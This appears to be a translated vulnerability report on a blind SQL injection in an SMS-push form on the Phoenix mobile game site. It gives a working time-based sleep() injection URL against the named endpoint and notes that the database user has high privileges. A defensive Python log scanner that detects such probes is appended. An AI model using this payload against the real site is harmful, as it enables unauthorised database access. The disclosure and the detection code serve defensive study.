Brief description:
The Phoenix mobile game site (凤凰手机游戏网) has a blind SQL injection vulnerability in the form where a phone number is entered to have a push link sent.
Details:
URL with the blind SQL injection:
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
The mysql system database is visible, so the user's privileges appear to be quite high.
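
For defenders reviewing logs for this kind of request, the following added example (not part of the original report) flags access-log entries whose gameid or mo value is not a plain integer or contains a MySQL delay function after URL decoding. It assumes both parameters are meant to be numeric and a combined-format access log; the log lines, IP addresses and leading path slash are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: on this endpoint both parameters are expected to be plain integers.
NUMERIC_PARAMS = {"gameid", "mo"}
# MySQL delay primitives used by time-based blind injection probes.
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# Request target inside a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def inspect_url(url):
    """Return (parameter, reason) findings for one request URL."""
    findings = []
    # parse_qsl percent-decodes, so %27 -> ' and %28 -> ( before matching.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.append((name, "non-numeric value"))
        if DELAY_RE.search(value):
            findings.append((name, "time-delay function"))
    return findings

def scan_log(lines):
    """Map each flagged request target to its findings."""
    flagged = {}
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and (found := inspect_url(m.group(1))):
            flagged[m.group(1)] = found
    return flagged

# Constructed access-log lines; the second carries the query string from the report.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Apr/2013:10:00:01 +0800] "GET /fenghuang/game/'
    'game_send_sms.jsp?gameid=130221346000&mo=1 HTTP/1.1" 200 512',
    '192.0.2.77 - - [11/Apr/2013:10:00:09 +0800] "GET /fenghuang/game/'
    'game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1'
    ' HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for target, found in scan_log(SAMPLE_LOG).items():
        print(target, found)
```

The same integer-only check applied server-side before the value reaches the query, together with a parameterized statement, removes the injection point rather than only detecting probes against it.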